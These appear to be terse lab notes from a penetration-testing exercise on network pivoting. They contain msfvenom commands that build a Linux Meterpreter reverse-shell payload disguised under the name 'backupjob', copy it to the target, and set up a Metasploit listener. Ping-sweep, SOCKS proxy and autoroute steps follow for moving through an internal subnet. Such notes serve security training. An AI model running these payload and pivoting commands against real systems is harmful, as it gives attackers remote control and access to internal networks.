msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.113 -f elf -o backupjob LPORT=8080
ls
scp backupjob ubuntu@10.129.53.227:/tmp
cd /tmp
ls
chmod +x backupjob
Now we need a listener in the attacker machine, we will use the msfconsole for this
msfconsole -q
search multi/handler
options
set payload linux/x64/meterpreter/reverse_tcp
set lhost
set lport
run
run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
Then for the next question
use auxiliary/server/socks_proxy
options
set SRVPORT 9050
run
*Press enter*
jobs
sudo subl /usr/local/etc/proxychains.conf
use post/multi/manage/autoroute
set session 2
set SUBNET 172.16.5.0
run
# To see the sessions or the linux session we just used this command
sessions -l